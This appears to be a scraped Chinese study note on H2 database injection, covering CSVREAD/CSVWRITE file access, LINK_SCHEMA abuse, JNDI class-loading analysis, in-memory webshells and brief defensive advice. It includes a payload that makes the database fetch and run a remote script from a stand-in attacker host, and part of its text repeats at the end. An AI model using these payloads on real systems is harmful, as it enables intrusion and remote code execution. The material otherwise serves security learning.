H2数据库注入系统学习文档<\/h1>

1. H2数据库基础注入技术<\/h2>

1.1 文件读取<\/h3>

H2数据库提供了文件读取功能，可以通过以下SQL语句实现：<\/p>

SELECT<\/span> *<\/span> FROM<\/span> CSVREAD('文件路径'<\/span>);
<\/span><\/span><\/code><\/pre>简化用法（只输入文件名参数）：<\/p>
SELECT<\/span> *<\/span> FROM<\/span> CSVREAD('test.txt'<\/span>);
<\/span><\/span><\/code><\/pre>1.2 文件写入<\/h3>
H2数据库支持文件写入操作：<\/p>
CALL<\/span> CSVWRITE('文件路径'<\/span>, 'SELECT * FROM TABLE'<\/span>);
<\/span><\/span><\/code><\/pre>注意问题<\/strong>：<\/p>

写入文件时可能会遇到类型转换错误（如NumberFormatException<\/code>）<\/li>
原因是H2在获取结果时，会根据第一行对应列的数据类型决定后续行的数据类型<\/li>
当file_write<\/code>返回数字而后续行包含字符串（如"admin"）时，会导致转换错误<\/li>
<\/ul>
2. JDBC连接利用<\/h2>
2.1 link_schema函数<\/h3>
H2提供了link_schema<\/code>表函数，可以用于发起JDBC连接：<\/p>
SELECT<\/span> *<\/span> FROM<\/span> LINK_SCHEMA('驱动类名'<\/span>, 'JDBC URL'<\/span>, '用户名'<\/span>, '密码'<\/span>, '模式名'<\/span>);
<\/span><\/span><\/code><\/pre>2.2 远程SQL代码执行<\/h3>
利用JDBC连接可以执行远程SQL代码，需要注意：<\/p>

H2中单引号('<\/code>)括起来的是字符串，双引号("<\/code>)括起来的是列名<\/li>
单引号转义不是用反斜杠，而是用两个单引号表示一个单引号<\/li>
<\/ol>
利用方式<\/strong>：<\/p>
SELECT<\/span> *<\/span> FROM<\/span> LINK_SCHEMA('org.h2.Driver'<\/span>, 'jdbc:h2:mem:test;INIT=RUNSCRIPT FROM ''http:\/\/attacker.com\/evil.sql'''<\/span>, 'sa'<\/span>, 'sa'<\/span>, 'PUBLIC'<\/span>);
<\/span><\/span><\/code><\/pre>不出网情况下的利用<\/strong>：<\/p>

先将SQL脚本写入目标机器<\/li>
再发起JDBC连接执行本地脚本<\/li>
<\/ol>
3. JNDI注入分析<\/h2>
3.1 link_schema底层实现<\/h3>
分析LinkSchemaFunction<\/code>的getValue<\/code>方法，最终会进入JdbcUtils.getConnection<\/code>，关注driver<\/code>和url<\/code>两个参数。<\/p>
关键点：<\/p>

如果URL以jdbc:h2<\/code>开头，则发起JDBC连接<\/li>
否则对driver<\/code>参数进行类加载<\/li>
<\/ul>
3.2 类加载机制<\/h3>
loadUserClass<\/code>方法流程：<\/p>

检查allowedClassNames<\/code>（默认为*<\/code>，允许所有类）<\/li>
使用Class.forName<\/code>进行类加载<\/li>
<\/ol>
加载完成后：<\/p>

如果是驱动类，则进行newInstance<\/code><\/li>
如果是Context<\/code>类，则发起JNDI连接<\/li>
<\/ul>
3.3 JNDI限制<\/h3>
高版本H2对JNDI有限制：<\/p>

2.1.x全版本：URL必须以java:<\/code>开头<\/li>
2.0.x < 2.0.206：无此限制<\/li>
<\/ul>
4. 内存马技术<\/h2>
4.1 不出网情况下的利用<\/h3>
当目标不出网无法反弹shell时，可以考虑使用内存马技术。<\/p>
4.2 Filter型内存马实现步骤<\/h3>

将恶意代码写入目标机器<\/li>
加载并执行恶意代码<\/li>
<\/ol>
测试代码示例：<\/p>
\/\/ 这里应包含Filter内存马的具体实现代码
<\/span><\/span><\/span>\/\/ 通常包括动态注册Filter、命令执行逻辑等
<\/span><\/span><\/span><\/code><\/pre>5. 防御建议<\/h2>

限制H2数据库的文件系统访问权限<\/li>
升级到最新版本的H2数据库（注意JNDI限制）<\/li>
避免在生产环境使用H2的link_schema<\/code>等危险功能<\/li>
实施严格的输入验证和参数化查询<\/li>
限制数据库用户的权限，避免使用高权限账户<\/li>
<\/ol>
6. 总结<\/h2>
H2数据库注入技术主要包括：<\/p>

文件系统操作（读写）<\/li>
JDBC连接滥用<\/li>
JNDI注入<\/li>
内存马技术<\/li>
<\/ul>
防御关键在于：<\/p>

及时更新补丁<\/li>
最小权限原则<\/li>
禁用危险功能<\/li>
输入输出过滤<\/li>
<\/ul>

H2数据库注入系统学习文档<\/h1>

1. H2数据库基础注入技术<\/h2>

2. JDBC连接利用<\/h2>

3. JNDI注入分析<\/h2>

4. 内存马技术<\/h2>

4.1 不出网情况下的利用<\/h3> 当目标不出网无法反弹shell时，可以考虑使用内存马技术。<\/p>

6. 总结<\/h2> H2数据库注入技术主要包括：<\/p> 文件系统操作（读写）<\/li> JDBC连接滥用<\/li> JNDI注入<\/li> 内存马技术<\/li> <\/ul> 防御关键在于：<\/p> 及时更新补丁<\/li> 最小权限原则<\/li> 禁用危险功能<\/li> 输入输出过滤<\/li> <\/ul>

4.1 不出网情况下的利用<\/h3>
当目标不出网无法反弹shell时，可以考虑使用内存马技术。<\/p>